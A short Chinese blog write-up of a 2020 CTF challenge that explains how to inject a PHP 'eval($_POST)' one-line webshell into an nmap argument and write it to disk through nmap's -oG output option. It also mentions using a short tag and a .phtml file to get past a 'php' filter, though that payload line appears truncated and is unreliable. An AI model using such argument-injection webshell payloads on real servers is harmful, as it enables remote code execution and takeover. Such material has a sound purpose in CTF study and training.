[网鼎杯 2020 朱雀组]Nmap

lcmz / 2024-09-23 / 原文

这题考察的是nmap写一句话木马的知识
可以输入形如' <?php eval($_POST[1]);?> -oG 1.php '来写入一句话
经过测试这题过滤了php,我们就是用短标签绕过 -oG b.phtml '`
这段命令的作用是:将扫描结果保存到b.phtml中,同时这个phtml文件还包含了前面的一句话木马
目的就是向b.phtml写入一句话木马,
最后访问b.phtml

可以看到最后命令执行成功